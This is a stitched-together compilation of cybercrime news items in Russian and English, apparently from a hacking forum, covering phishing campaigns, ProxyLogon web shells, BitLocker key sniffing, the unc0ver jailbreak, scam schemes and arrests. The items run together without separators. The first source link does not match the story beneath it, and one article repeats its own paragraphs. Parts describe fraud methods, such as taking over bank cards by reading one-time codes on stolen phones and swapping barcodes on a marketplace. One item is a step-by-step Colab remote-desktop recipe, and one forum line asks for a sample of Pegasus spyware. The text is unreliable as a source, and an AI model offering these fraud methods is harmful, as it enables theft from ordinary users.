• Source: prokuratura.gov.by/ru/media/novosti/nadzor-za-resheniyami-po- ugolovnym-i-grazhdanskim-delam/pokhishchal-denezhnye-sredstva-putem- modifikatsii-kompyuternoy-informatsii-prokuratura-brestskoy-obl/
Злоумышленники воспользовались почтовой службой SendGrid для кражи криптовалюты пользователей.
Вечером 12 февраля неизвестные хакеры взломали электронную почту регистратора доменов Namecheap, а затем распространили фишинговые письма от лица MetaMask и DHL, пытаясь украсть личную информацию и криптовалюту клиентов Namecheap.
Фишинговые письма отправлялись от лица SendGrid (дочерняя компания Twillio), платформы электронной почты, которую использовала Namecheap для отправки уведомлений о продлении аккаунта и маркетинговых рассылок.
После многочисленных жалоб пользователей в Twitter* генеральный директор Namecheap Ричард Киркендалл подтвердил , что учетная запись была скомпрометирована и что они отключили электронную почту через SendGrid на время расследования инцидента.
Он также добавил, что нарушение может быть связано с раскрытием API-ключей Mailgun, MailChimp и SendGrid в мобильных приложениях, о котором компания CloudSek рассказала в своём отчёте в декабре.
Фишинговые электронные письма выдают себя за DHL и MetaMask. Электронное письмо DHL содержит счет за доставку, а встроенные ссылки ведут на фишинговую страницу, предназначенную для кражи информации о цели.
В свою очередь, письмо от MetaMask призывало пройти проверку KYC (Know Your Customer), чтобы продолжить использовать кошелёк.
Фишинговое письмо и поддельная страница Metamask
Это электронное письмо содержит маркетинговую ссылку от Namecheap ( https://links.namecheap.com/ ), которая перенаправляет пользователя на фишинговую страницу, выдающую себя за MetaMask. На этой странице пользователю предлагается ввести «секретную фразу восстановления» или «закрытый ключ», как показано ниже.
Как только пользователь предоставляет фразу восстановления или закрытый ключ, злоумышленники могут использовать их для импорта кошелька на свои устройства и кражи всех средств.
Однако, Namecheap опроверг взлом и добавил, что это, скорей всего, была проблема в вышестоящей системе, которую компания использует для электронной почты. Также регистратор доменов заверил своих клиентов, что их учетные записи и личные данные остаются в безопасности
После инцидента Namecheap остановил рассылку всех электронных писем, включая отправку кода двухфакторной аутентификации, проверку доверенных устройств и электронные письма для сброса пароля, и начал совместное расследование с SendGrid. Все системы были восстановлены позже той же ночью.
Однако SendGrid заявил, что инцидент с Namecheap не был результатом взлома или компрометации систем SendGrid, что добавило еще больше путаницы в расследование инцидента. Кроме того, на данный момент количество жертв и суммы украденной криптовалюты неизвестны.
Компания порекомендовала всем конечным пользователям и организациям применять комплексный подход к борьбе с фишинговыми атаками, внедряя меры безопасности, такие как двухфакторная аутентификация, управление доступом по IP и использование обмена сообщениями на основе домена.
source:
twitter.com/NamecheapCEO/status/1624900762617757696
uploads-
ssl.webflow.com/635e632477408d12d1811a64/63d39f25b2f8c9e1bc109d13_Hardcoded-
API-Keys-of-Email-Marketing-Services-Puts-54M-Mobile-App-Users-at-Risk.pdf
Им предъявлены обвинения в нарушении авторских прав, мошенничестве и отмывании денег в связи с созданием сайта Z-Library.
Двух россиян задержали в Аргентине по запросу США из-за нарушения авторских
прав. Как сообщили в Минюсте США, их обвиняют в нарушении авторских прав,
мошенничестве и отмывании денег.
По данным ведомства, задержанные россияне Антон Напольский и Валерия Ермакова
руководили электронной библиотекой Z-library, с помощью которой якобы можно
бесплатно скачать книги, защищенные авторским правом.
В бруклинском суде им были предъявлены обвинения в преступном нарушении
авторского права, мошенничестве с использованием средств электронной связи
(wire-fraud) и отмывании денег для поддержания сайта.
В обвинительном заключении указано, что всего с 2009 года в библиотеке
разместили более 11 миллионов электронных книг. Также стражи порядка отключили
и изъяли 249 доменов библиотеки.
Граждане России были арестованы 3 ноября в аргентинском городе Кордова. В
Аргентину россияне приехали из Санкт-Петербурга.
Смекалистый преступник крадет деньги с карт, не используя программирования и средства взлома.
Согласно расследованию BBC Radio 4, злоумышленник ворует телефоны и карточки посетительниц популярной сети спортивных залов в Лондоне, а затем тратит деньги на дорогостоящие покупки.
После кражи телефона и карты, преступник регистрировал карту в приложении соответствующего банка на своем телефоне или компьютере. Поскольку карта используется на новом устройстве впервые, требуется одноразовый код подтверждения, который отправляется банком на украденный телефон. Код высвечивается на заблокированном экране украденного телефона, что позволяет вору получить полный контроль над банковским счетом.
Возможно, преступник — женщина, которая действует в одиночку. Поскольку только женщина может беспрепятственно пройти в женскую раздевалку, не вызывая подозрений.
Журналист BBC Шари Вахл подчеркнула, что телефоны и карты никогда нельзя оставлять вместе, особенно нельзя держать карту в чехле для телефона. Самое эффективное решение: пойти в спортзал без ценных вещей.
Лучший способ защититься от потери средств — скрыть текст уведомлений в настройках телефона. Тогда злоумышленник не сможет прочитать код подтверждения.
source: bbc.com/news/uk-england-london-62809151
RDP — это проприетарный протокол прикладного уровня, позаимствованный Microsoft из купленной у PictureTel телекоммуникационной программы Liveshare Plus, использующийся для обеспечения удалённой работы пользователя с сервером, на котором запущен сервис терминальных подключений.
1. Открываем
(<https://colab.research.google.com/drive/1uGy8kXmzOyW2tiw1GAJ7eni-
talRbKkp#scrollTo=zT0lv2xKU4va>) » Google Colab.
└ Кликаем » Play /
Spoiler: скрин
2. Открываем ссылку /
Spoiler: скрин
└ Во 2-й вкладке/не закрываем
3. Копируем » Debian Linux.
└ Открываем 1-ю вкладку /
Spoiler: скрин
4. Вставляем и задаем пароль.
└ Кликаем » Play /
Spoiler: скрин
5. Ожидаем около 5 минут.
└ Идем в 2-ю вкладку /
Spoiler: скрин
6. Далее необходимо нажать:
└ Удаленный доступ /
Spoiler: скрин
7. Готово, пользуемся
Компания Proofpoint обнаружила кампанию, связанную с китайской группировкой TA413. По данным исследователей, кампания была активна с января по февраль 2021 года. Хакеры атаковали тибетские организации по всему миру, используя вредоносное расширение для Firefox, которое похищало данные Gmail и Firefox, а затем загружало малварь в зараженные системы.
Исследователи рассказывают, что злоумышленники атаковали тибетские организации с помощью целевых фишинговых писем, которые заманивали жертв на сайты, где им предлагалось установить фейковое обновление для Flash, якобы необходимое для просмотра контента.

На самом деле эти ресурсы содержали код, разделяющий пользователей на группы. Так, лишь пользователям Firefox с активным сеансом Gmail предлагали установить вредоносное расширение, а другие жертвы хакеров не интересовали.
Вредоносное расширение носило имя Flash update components, но на самом деле представляло собой вариацию легитимного расширения Gmail notifier (restartless), и было способно злоупотреблять следующими функциями.
Gmail:
Firefox (зависит от предоставленных прав):
Однако на этом атака не заканчивалась. Расширение также загружало и устанавливало на зараженную машину малварь ScanBox. Это старый вредоносный инструмент на базе PHP и JavaScript, который не раз использовался в атаках китайских хак-групп. Последний зарегистрированный случай использования ScanBox датируется 2019 годом, когда аналитики Recorded Future заметили атаки на посетителей пакистанских и тибетских сайтов.
ScanBox способен отслеживать посетителей определенных сайтов, работать как кейлоггер, а также воровать пользовательские данные, которые могут быть использованы в будущих атаках.
Интересно, что на этот раз атаки с использованием поддельного Flash сработали как никогда хорошо. Хотя большинство пользователей давно знает, что следует держаться подальше от сайтов, предлагающих обновления Flash, в начале текущего года поддержка Flash была окончательно прекращена. 12 января 2021 года весь Flash-контент перестал воспроизводиться в браузерах, и, похоже, именно это сделало атаки TA413 намного успешнее, чем обычно.
Источник: xakep.ru/2021/03/01/ta413/
Following bans from payment processors and mass deletion of most of its
content, Pornhub announced new details on its improved trust and safety
polices.
In a statement released on Tuesday, Pornhub
announced more details on how it plans to address abuse on its platform,
including expanding its human moderation team, an upcoming transparency
report, and introducing biometric technology to verify users who upload
videos.
The new announcement comes after the platform [came under
scrutiny](https://newrepublic.com/article/160488/nick-kristof-holy-war-
pornhub) in December for claims it hosted child sexual abuse materia. Major
payment processors including Visa and Mastercard [suspended services to
Pornhub](https://www.vice.com/en/article/7k94be/mastercard-will-stop-
processing-payments-to-pornhub) indefinitely following those allegations, a
decision [sex workers who use the platform for
income](https://www.vice.com/en/article/n7v33d/sex-workers-what-visa-and-
mastercard-dropping-pornhub-means-to-performers) said would harm them.
In December, [Pornhub banned all non-verified
users](https://www.vice.com/en/article/v7m7k8/pornhub-banned-uploads-policy-
change) from posting to the site, and [deleted all content uploaded from
unverified sources](https://www.vice.com/en/article/jgqjjy/pornhub-suspended-
all-unverified-videos-content)—which amounted to more than 80 percent of all
videos on the platform. It also suspended new verifications, pending revised
policies.
Tuesday's statement says that verification will still be limited to people in
Pornhub's Model Program, and verification will be done by
Yoti, a digital identity verification company, "by
providing a current photo and government-approved identification document."
"Yoti will check the validity of the ID document and match the user’s ID
document to their photo using secure biometric technology," according to the
statement.
Following its unverified user ban and content purge, Pornhub promised more
details about how verification would work in the new year—while [fetish and
trans creators wondered](https://www.vice.com/en/article/v7mzpj/pornhub-
content-deleted-verification) if identity verification would exclude them from
using the platform. Trans performer Dylan
Thomas told me at the time that he was
concerned about excluding already-marginalized groups with stricter
verification processes, and that Pornhub could avoid this by consulting with,
and hiring, them to help create the new system.
In a Twitter response to Thomas on Tuesday, Yoti said that it [partnered with
UK-based transgender charity Sparkle](https://www.yoti.com/blog/yoti-sparkle-
transgender-partnership/), and linked to an announcement of the partnership
from 2019 that says the organizations are working together to make the process
of proving one's identity more inclusive.
Other portions of the expanded policies include details about how moderators
will work going forward, including that they will "regularly monitor search
terms within the platform for increases in phrasings that attempt to bypass
the safeguards in place." A [Motherboard investigation in
2020](https://www.vice.com/en/article/mb8zjn/pornhub-doxing-and-harassment-
girls-do-porn-lawsuit) found that Pornhub users could bypass the platform's
moderation efforts with slightly modified search terms.
Moderators will also be trained more rigorously, and offered support and
therapy. "Content moderators will also undergo further exhaustive training to
identify potentially illegal material and testing," Pornhub said. "If needed,
content moderators have access to specialized support, including wellness
benefits and therapeutic measures, to support them in their critical work."
Platforms like [Facebook](https://www.vice.com/en/article/xwk9zd/how-facebook-
content-moderation-works) and YouTube have been criticized in the past about
their poor labor practices for moderators who have to view violent or sexually
explicit content all day. [In
September](https://www.vice.com/en/article/93544v/youtube-content-moderator-
class-action-lawsuit), a former contracted content moderator at YouTube
brought a class action lawsuit against the company for its lack of support for
moderators who view traumatizing content as part of their jobs.
In its statement, Pornhub also announced that it will release a transparency
report "detailing its content moderation results from 2020, including the
total number of reports filed with [the National Center for Missing &
Exploited Children], as well as other key details related to the trust and
safety of the platform."
"Much like Facebook, Instagram, Twitter and other tech platforms, Pornhub
seeks to be fully transparent about the content that should and should not
appear on the platform," Pornhub said in the statement. "This report will be
the first of its kind among adult content platforms, setting the standard for
transparency and accountability in the industry."
Visa and Mastercard both told Motherboard that suspensions for Pornhub payment
processing remain in effect.
Компания Google опубликовала статику выплат по bug bounty программам за прошедший 2020 год. Оказалось, за это время исследователи из 62 стран мира обнаружили 662 уязвимости в продуктах Google, заработав на этом более 6 700 000 долларов.

Это самая крупная сумма выплат за все годы существования программ вознаграждения за уязвимости, превышающая даже 6 500 000 долларов, потраченные компанией в 2019 году.
Большинство выплат ИБ-эксперты получили за ошибки, найденные в рамках программы Chrome VRP (Vulnerabilities Rewards Program): более 2 100 000 долларов за 300 уязвимостей, обнаруженных в браузере Google. Это на 83% больше, чем в 2019 году.
Еще одной важной частью программы компании стала bug bounty инициатива для Android. На уязвимостях в коде мобильной ОС исследователи заработали порядка 1 740 000 долларов, и еще 270 000 долларов им принесли ошибки, найденные в популярных и широко используемых приложениях из Google Play Store.
Также в отчете компании перечислены следующие интересные цифры 2020 года:
По программе исследовательских грантов Google ИБ-исследователям было передано около 400 000 долларов. Так, гранты получили более 180 экспертов, которые в итоге прислали 200 отчетов об ошибках, благодаря чему были обнаружены 100 подтвержденных багов в продуктах Google и опенсорсной экосистеме.
Источник: xakep.ru/2021/02/04/google-vrp-stats/
Двое молодых россиян из Саратовской области устроились на работу на склад Wildberries в Коледино и мошенническим путем завладели восемью миллионами рублей.
По данным источника, 28-летний Александр Перкин и 27-летний Роман Дубенцов разработали целую схему вывода средств. Работая кладовщиками, мужчины открыли ИП и зарегистрировались на платформе Wildberries.
Однако вместо того, чтобы продавать реальный товар, аферисты стали переклеивать штрихкоды со своих несуществующих товаров, которые «стоили» копейки, на дорогостоящие: стиральные машины, телевизоры и прочую технику.
После этого мужчины сами заказывали свой «дешевый» товар, но забирали имущество других продавцов. В результате на разнице россиянам удалось получить 7 млн 963 тыс. руб.
Мошенническая схема раскрылась, когда один из представителей маркетплейса заметил серьезную недостачу и обратился в полицию. Сейчас оба афериста задержаны.
source: t.me/shot_shot/47970
Does anyone have a sample or know more about it?

](https://www.haaretz.com/israel-news/2022-08-05/ty-article/.premium/israel- polices-version-of-pegasus-spyware- revealed/00000182-6911-d2f5-a3e6-ed1db74e0000)
 www.haaretz.com
По информации «РБК», ФСБ возбудила уголовное дело о попытке взлома сетевым инженером структуры «Ростеха». Бывший сотрудник техподдержки интернет- провайдера «Макснет Системы» (бренд Maxnet) Никита Демидов подозревается во взломе компьютерной сети Обнинского научно-производственного предприятия «Технология» им. А. Г. Ромашина. Сетевой специалист рассказал «РБК», что он не занимался взломом, а наоборот пытался пресечь атаку извне на ресурсы клиентов, проверяя их роутеры на наличие уязвимостей.
Демидов предложил своему руководителю сканировать оборудование связи в сетях клиентов, чтобы предупредить о том, что там нужно сменить штатные настройки и пароли, а также обновить прошивки сетевого оборудования.
Инженер некоторое время сканировал все сети клиентов с помощью бесплатной утилиты Router Scan. Среди сканируемых адресов оказался IP-адрес ОНПП «Технология», на котором находился электронный почтовый ящик предприятия. Именно в этот момент его деятельность зафиксировала Государственная система обнаружения, предупреждения и ликвидации последствий компьютерных атак на информационные ресурсы (ГосСОПКА). Система была подключена к сети связи «Технологии», так как это предприятие является оборонным и его информационные системы являются объектами критической информационной инфраструктуры, атака на которые по части 1 статьи 274.1 УК РФ (создание, распространение или использование программ, предназначенных для неправомерного воздействия на критическую информационную инфраструктуру России) предусматривает лишения свободы на срок от двух до пяти лет со штрафом в размере до 1 млн руб.
Через несколько дней после проведения этапа сканирования к Демидову пришли с обыском сотрудники ФСБ и изъяли личный компьютер. Позже против него было возбуждено уголовное дело.
Адвокат Демидова отправил запрос администрации «Технологии» и попытался выяснить, нанес ли этот взлом ущерб предприятию. Ему был дан отрицательный ответ. Так же защите непонятна суть обвинения, так как почтовый сервер электронной почты «по определению не является критической инфраструктурой, поскольку влияние его выхода на деятельность предприятия минимально».
Эксперт «РБК» пояснил, что действия Демидова можно считать пентестом, но при условии, если бы клиенты провайдера согласились перед этим на сканирование своего сетевого оборудования. По факту этого провайдер и инженер официально не сделали перед началом сканирования систем клиентов. Проблема еще в том, что Демидов проводил сканирование сетей клиентов из дома с домашнего компьютера. Он работал удаленно, его вычислили по домашнему IP-адресу. В итоге ФСБ все обвинения предъявила ему как физлицу, а не как представителю компании.
В настоящее время идет следствие по этому делу, специалисты обвинения проводят дополнительную экспертизу изъятого у Демидова компьютера.
«Следственным департаментом МВД России при оперативном сопровождении Управления «К» МВД России, участии экспертного сообщества и во взаимодействии с правоохранительными органами Германии расследуется уголовное дело о хищениях участниками организованной группы хакеров денежных средств с банковских счетов российских коммерческих организаций.
По версии следствия, в период с марта по декабрь 2018 года пятеро жителей Орловской области, городов Кургана, Новосибирска и Санкт-Петербурга, а также их соучастники распространили в сети Интернет вредоносное программное обеспечение. Получив доступ к компьютерам ряда российских коммерческих организаций и возможность дистанционно управлять установленными на них программами банковского обслуживания, злоумышленники похитили свыше 15 миллионов рублей. При этом они использовали анонимные сервисы для обмена сообщениями и другие средства конспирации.
Расследование ведет специализированный отдел по расследованию особо важных дел о преступлениях против собственности, совершенных с использованием информационно-телекоммуникационных технологий, управления по расследованию организованной преступной деятельности Следственного департамента МВД России.
Уголовные дела в отношении троих сообщников, обвиняемых в совершении преступлений, предусмотренных частью второй статьи 273 (3 эпизода), частью третьей статьи 272 (3 эпизода), частью четвертой статьи 159.6 (3 эпизода) УК РФ, направлены в суды для рассмотрения по существу.
На днях при попытке вылететь в город Бишкек Киргизской Республики задержан еще один фигурант. В настоящее время ему также предъявлено обвинение в инкриминируемых деяниях и избрана мера пресечения в виде заключения под стражу. Предварительное расследование в отношении данного гражданина и остальных участников противоправной деятельности продолжается», - сообщила официальный представитель МВД России Ирина Волк.
• Source: мвд.рф/news/item/23867045
Министерство юстиции США сообщило, что суд в начале апреля предоставил ФБР полномочия использовать веб-шеллы, ранее установленные хакерами на уязвимых серверах Exchange в США, и удалять вредоносное ПО (без ведома владельцев серверов). В ФБР не сообщили, сколько именно веб-шеллов было удалено, но «операция прошла успешно»

Ордер
Напомню, что корень проблемы заключается в том, что в начале марта 2021 года инженеры Microsoft выпустили внеплановые патчи для четырех уязвимостей, которым исследователи дали общее название ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065). Эти уязвимости можно объединить в цепочку, а их эксплуатация позволит злоумышленнику пройти аутентификацию на сервере Exchange, получить права администратора, установить малварь и похитить данные. В итоге атаки на уязвимые серверы совершали более 10 хакерских групп, разворачивая на серверах веб-шеллы, майнеры и шифровальщики.
По данным американских властей и ИБ-экспертов, китайские «правительственные» хакеры активно использовали баги ProxyLogon еще в январе и феврале 2021 года, а после придания уязвимостей огласке к ним присоединились и другие преступники.
Как сообщается теперь, некоторые из этих веб-шеллов не были должным образом защищены и повторно использовали один и тот же пароль. Этим обстоятельством и воспользовались сотрудники ФБР, чтобы удалить малварь.
«Сегодняшнее санкционированное судом удаление вредоносных веб-шеллов демонстрирует стремление Министерства юстиции пресекать хакерскую деятельность с использованием всех доступных юридических инструментов, а не только судебного преследования», — заявляют в Министерстве юстиции.
Click to expand...
Подчеркивается, что во время операции ФБР не патчило уязвимые серверы Exchange и не пыталось обнаружить и удалить другие вредоносные программы, которые могли быть установлены в систему при помощи веб-шеллов.
«Исходя из моей подготовки и опыта, большинство жертв вряд ли удалят оставшиеся веб-шеллы самостоятельно, потому что их трудно найти из-за уникальных имен файлов и путей, а также в силу того, что жертвы не имеют технической возможности удалить их самостоятельно», — заявлял под присягой сотрудник ФБР, когда Бюро запрашивало у суда ордер.
В настоящее время ФБР уведомляет пострадавших, чьи серверы Exchange были взломаны и обнаружены во время проведения операции.
Источник: xakep.ru/2021/04/14/fbi-vs-proxylogon/
The Federal Bureau of Investigation has published its annual report on cybercrime affecting victims in the U.S., noting a record number of complaints and financial losses in 2020 compared to the previous year.
The Internet Crime Complaint Center (IC3) received last year 791,790
complaints - up by 69% from 2019 - of suspected internet crime causing more
than $4 billion in losses.
The Federal Bureau of Investigation has published its annual report on
cybercrime affecting victims in the U.S., noting a record number of complaints
and financial losses in 2020 compared to the previous year.
The Internet Crime Complaint Center (IC3) received last year 791,790
complaints - up by 69% from 2019 - of suspected internet crime causing more
than $4 billion in losses.
Referring to BEC scams, the Hassold said that when considering spoofing as a
subset of this cybercriminal activity, the financial impact is closer to $2.1
billion.
BEC scams are carried out by compromising business email accounts and to modify transaction details so that funds are transferred to a bank account controlled by the attacker.
A trend observed in 2020 was the use of identity theft and converting funds to cryptocurrency. In these cases, an initial victim (extortion, tech support, romance scam) provided their ID to the fraudster.
BEC scammers would use the ID to open bank accounts and receive BEC funds that would be quickly converted to cryptocurrency to lose track of the money.
Since 2018, the FBI has a Recovery Asset Team specialized in freezing accounts used for unauthorized BEC transfers and recovering money that can still be tracked.
Las year, RAT was able to freeze and recover a little over 82% from almost $463 million in losses reported in 1,303 incidents.
One case involved an illegal wire transfer of $60 million from a victim company in St. Louis to a bank account in Hong Kong controlled by the fraudsters.
One type of cybercrime that is grossly misrepresented in FBI’s annual report is ransomware, with 2,474 complaints and adjusted losses of more than $29.1 million.
Although the figures are small, they represent an increase compared to 2019, when IC3 received 2,047 complaints and the losses were above $8.9 million.
Ransomware is a multi-billion cybercriminal business that has not stopped growing, with some actors’ demands averaging upward of $1million.
In just five months, the Netwalker ransomware gang made $25 million from paying victims last year. One of its affiliates, charged in the U.S., is believed to have made more than $27 million from this activity.
Other ransomware operations - Maze, Conti, Egregor, REvil, Ryuk, Doppel Paymer
These gangs target big-revenue companies that would stand to lose more from downtime or data leaks than from paying the ransom. Many of these attacks remain unreported to avoid legal complications.
Looking at the raw figures in FBI’s Internet Crime Complaint Center latest report, cybercrime has recorded a significant growth in 2020, both in terms of filed complaints and money lost by victims in the U.S.
Весной прошлого года мы рассказывали о релизе джейлбрейка Unc0ver версии 5.0.0. Примечательно, что этот инструмент работал практически для любых iPhone, даже с новейшей на тот момент iOS 13.5 на борту, и в последний раз похожий инструмент выпускался в 2014 году.
Тогда авторы Unc0ver объясняли, что используют уязвимость нулевого в ядре iOS, о которой еще не знают специалисты Apple. Сообщалось, что уязвимость была обнаружена одним из участников команды, который известен под псевдонимом Pwn20wnd.
Летом 2020 года Apple представила iOS 13.5.1 для iPhone, iPad и iPod touch, и Unc0ver перестал работать. Дело в том, что в этом релизе исправили уязвимость CVE-2020-9859, которую и эксплуатировал джейлбрейк (приложение могло получить привилегии ядра и выполнять произвольный код).
Теперь, спустя год после этих событий, разработчики Unc0ver вернулись с версией 6.0.0, которая работает для устройств под управлением iOS версий от 11.0 до 14.3 (то есть практически для всех моделей iPhone и iPad).
Unc0ver неспроста не работает на устройствах под управлением iOS 14.4. Эта версия ОС, вышедшая в конце января, содержит патч для бага CVE-2021-1782. Как не трудно догадаться, это еще одна уязвимость ядра, которую можно применить для повышения привилегий, чем и пользуются авторы джейлбрейка.
В январе инженеры Apple сообщали, что CVE-2021-1782 — это одна из трех уязвимостей, которой на момент выхода патчей уже пользовались злоумышленники. Обо всех трех недостатках Apple уведомил некий анонимный исследователь, и компания не обнародовала никакой информации об атаках, в ходе которых использовались эти баги.
Разработчики джейлбрейка Unc0ver пишут в Twitter, что они создали «собственный эксплоит на основе CVE-2021-1782 для unc0ver для достижения оптимальной скорости и стабильности».
__https://twitter.com/x/status/1364878565523787777
Источник: xakep.ru/2021/03/03/unc0ver-6-0-0/
Major 'Stable' versions of Microsoft Edge will now be released every four weeks to synchronize with the new four-week release cycle announced by Google Chrome.
In the past, a new 'Stable,' or production level, version of Google Chrome is released every six weeks after first being tested in the 'Dev' and 'Beta' channels.
This month, Google announced they were switching from a six-week release cycle
to a four-week cycle after improving their testing and release process.
"As we have improved our testing and release processes for Chrome, and
deployed bi-weekly security updates to improve our patch
gap,
it became clear that we could shorten our release cycle and deliver new
features more quickly," Google
announced.
As Microsoft Edge is based on Chromium, starting with Microsoft Edge 94, they
too are switching to a four-week cycle to match Chromium's releases, allowing
Windows 10 users to get access to new Chromium features at a faster pace.
For those Microsoft features developed exclusively for Edge, this change
likely does not mean that these features will reach 'Stable' versions any
faster.
As new features still need to be adequately tested with a large base of users before making it into a production build, we can expect to see new features span multiple builds for testing before they are released.
As the enterprise tends to need longer release cycles, Microsoft offers an 'Extended Stable' option that will allow organizations to opt for a more extended 8-week 'Stable' release cycle.
When opting into this extended-release cycle, Microsoft Edge will continue to receive biweekly security updates, but Microsoft will move the 'Stable' version containing new features to the 8-week release cycle.
Microsoft has not provided details as of yet on the enterprise can opt into these extended releases but states that information will be available in the coming months.
От Армении до Казахстана — фальшивые сайты растут с каждым месяцем.
За последние три года киберпреступники существенно усовершенствовали
мошенническую схему «Мамонт», которая изначально появилась в 2019 году. По
данным экспертов
кибербезопасности, злоумышленники активно расширяют географию атак и осваивают
новые методы хищения средств.
Количество групп, работающих по схеме «Мамонт»
На текущий момент специалисты выявили 16 крупных преступных групп, в которых
работает свыше 20 000 мошенников. Только за период с июля 2023 по июнь 2024
года злоумышленники похитили у жителей России и стран СНГ более 1,2 млрд
рублей. Общий ущерб от действий преступников во всех странах с начала 2021
года превысил 8,6 млрд рублей.
Выбор банка на фишинговом сайте
Аналитики отмечают три главных тренда в развитии схемы за последний год. Во-
первых, мошенники начали использовать новый способ доставки вредоносного
программного обеспечения на устройства пользователей. После оплаты на
фишинговом сайте жертве предлагают скачать приложение якобы для отслеживания
доставки заказа. Установленная программа позволяет злоумышленникам получить
полный контроль над устройством, оформлять кредиты на имя жертвы и выводить
средства со всех банковских счетов.
Второй тренд связан с расширением списка банков в странах СНГ, чьи бренды
используются для создания поддельных страниц. Мошенники активно применяют
фишинговые сайты с имитацией личных кабинетов банков Армении, Киргизии,
Узбекистана, Азербайджана и Казахстана.
Страница с вводом банковских данных
Третьим значимым изменением стало включение схемы «Антикино» в арсенал
некоторых крупных групп. Злоумышленники регистрируются на сайтах знакомств под
видом девушек и после непродолжительного общения предлагают жертве купить
билеты в кино или театр, направляя на фишинговый сайт.
Сферы деятельности, бренды которых мошенники используют для создания
фишинговых страниц в схеме «Мамонт»
В конце сентября 2024 года произошло важное событие, повлиявшее на активность
мошенников. После заявления основателя Telegram Павла Дурова о возможности
раскрытия данных нарушителей правоохранительным органам, многие группы начали
покидать платформу. Одна из крупнейших групп с аудиторией более 10 000
участников объявила о переходе на собственную веб-платформу и запуске
анонимного сайта в даркнете.
Сообщение в одной из мошеннических групп об уходе с Telegram
В результате доходы 70% мошеннических групп за четыре недели снизились в
среднем на 22% - с 58 до 45 млн рублей. Ситуацию усугубила блокировка счетов
платформой CryptoBot, которую злоумышленники использовали для вывода средств.
Специалисты подсчитали, что с начала 2020 по первую половину 2024 года было
создано 1 566 различных групп, работающих по схеме «Мамонт». Хотя большинство
групп существует недолго, на смену прекратившим деятельность постоянно
приходят новые. Средняя сумма хищения в России составила 9 008 рублей.
Для создания фишинговых страниц преступники используют 97 уникальных брендов в
странах СНГ. Лидером по количеству брендов-приманок стала Россия (42), далее
следуют Армения (30), Азербайджан (18), Казахстан (16), Узбекистан (11),
Киргизия (6) и Таджикистан (5).
Аналитики отмечают, что развитие мошеннических сервисов упрощает вход новых
участников в криминальный бизнес, так как не требует технических знаний. Для
защиты от мошенников специалисты рекомендуют пользователям проверять дату
создания сайтов через whois-сервисы, с осторожностью относиться к большим
скидкам, вести переписку только через официальные каналы торговых площадок и
не переносить общение в мессенджеры.
facct.ru/blog/mammoth-attacks-banks
За 43 секунды можно узнать все, что скрывает пользователь.
Взлом защиты BitLocker за 43 секунды с использованием оборудования стоимостью менее $10 стал возможен, что ставит под вопрос надежность одного из самых популярных методов шифрования жестких дисков в системе Windows.
С момента появления в Windows Vista, BitLocker пользовался широкой популярностью, предлагая пользователям эффективное средство защиты данных. Однако давно известно, что при прямом доступе к аппаратному обеспечению, BitLocker можно обойти. Microsoft утверждает, что для успешного взлома требуются значительные навыки и длительный доступ к оборудованию, но эксперименты показывают иное.
Перехват ключей через шину LPC
Исследователь под псевдонимом Stacksmashing решил проверить, насколько длительным должен быть доступ, и результаты его эксперимента поражают. Оказывается, для кражи ключей BitLocker достаточно всего 43 секунды и простого набора оборудования. Проблема заключается в хранении ключей шифрования. Проще говоря, ключи хранятся в модуле Trusted Platform Module (TPM) и передаются через шину LPC (Low Pin Count) при загрузке компьютера. Именно на этом этапе ключи могут быть перехвачены.
Stacksmashing продемонстрировал уязвимость на примере старого ноутбука Lenovo Thinkpad (X1 Carbon первого или второго поколения), где на материнской плате имеется неиспользуемый разъем, облегчающий доступ к шине LPC. Для перехвата ключей был использован Raspberry Pi Pico, установленный на специально разработанную плату с пружинными контактами Pogo Pins, что позволило легко подключиться к необходимым точкам. Stacksmashing также опубликовал на GitHub код ПО для проведения атаки.
Видео-демонстрация взлома BitLocker
Стоит отметить, что даже после кражи ключей, злоумышленнику все равно придется приложить усилия для получения данных с диска, например, скопировав их через USB. Тем не менее, эксперимент показывает, что старые модели ноутбуков, такие как X1 Carbon, подвержены риску, несмотря на наличие USB 3.0.
Однако современные компьютеры обладают дополнительной защитой, включая интеграцию TPM непосредственно в процессор, что усложняет процесс перехвата ключей. Тем не менее, развитие технологий постоянно ставит новые вызовы перед разработчиками защитных систем, и будущие эксперименты могут показать новые уязвимости даже в самых современных устройствах.
sc: github.com/stacksmashing/pico-tpmsniffer
Немецкие правоохранители конфисковали серверы FlyHosting, даркнет-ресурса, предназначенного для преступников, занимающихся организацией DDoS-атак по найму. FlyHosting рекламировался на хак-форумах, заявляя, что открыт для всех, кто ищет надежное место для размещения малвари, управления ботнетами или DDoS- инфраструктурой.
Федеральное ведомство уголовной полиции Германии (Bundeskriminalamt, BKA) сообщает, что 30 марта 2023 года было выдано восемь ордеров на обыск и выявлено пять человек в возрасте от 16 до 24 лет, подозреваемых в использовании некоего «интернет-сервиса» с середины 2021 года. Пока власти не раскрывают имен подозреваемых, а также название интернет-сервиса, о котором идет речь.
«Ранее неизвестные преступники использовали интернет-сервис, предоставленный подозреваемыми, например, для организации DDoS-атак», — заявляют в BKA.
Власти сообщают, что в результате DDoS-атак, организованных подозреваемым в период с середины 2021 года, сайты различных компаний, а также сайты полиции Гессена в нескольких случаях были перегружены, «чтобы их можно было использовать только в ограниченной степени или невозможно было использовать вовсе».
Известный ИБ-журналист Брайан Кребс пишет, что первые новости о рейде на FlyHosting появились еще на прошлой неделе, в частности, в Telegram-канале, который часто посещают лица вовлеченные в индустрию DDoS-атак по найму.
«Flyhosting совершил “миграцию” своих системам в новые помещения полиции
,
— писал пользователь с ником Dstatcc. — Мы ожидаем, что полиция тщательно
изучит файлы, журналы платежей и IP-адреса. Если вы использовали их сервер, и
[полиция] может найти “плохие вещи”, связанные с вами (оплаченные через личный
PayPal), вам стоит обратиться к адвокату».
В заявлении властей говорится, что в ходе обысков полиция конфисковала мобильные телефоны, ноутбуки, планшеты, различные носители информации и рукописные заметки у обвиняемых, а также серверы, которыми они управляли в Германии, Финляндии и Нидерландах. Правоохранители подтвердили Брайану Кребсу, что конфискация и рейды были связаны именно с FlyHosting.
Судя по всему, действия против FlyHosting связаны с масштабной международной операцией правоохранителей PowerOff, основной целью является ликвидация криминальных DDoS-инфраструктур по найму по всему миру.
К примеру, в конце 2022 года в рамках этой операции были конфискованы и закрыты 48 доменов, а также выдвинуты обвинения против шести подозреваемых, которые были причастны к управлению платформами для DDoS-атак по найму.
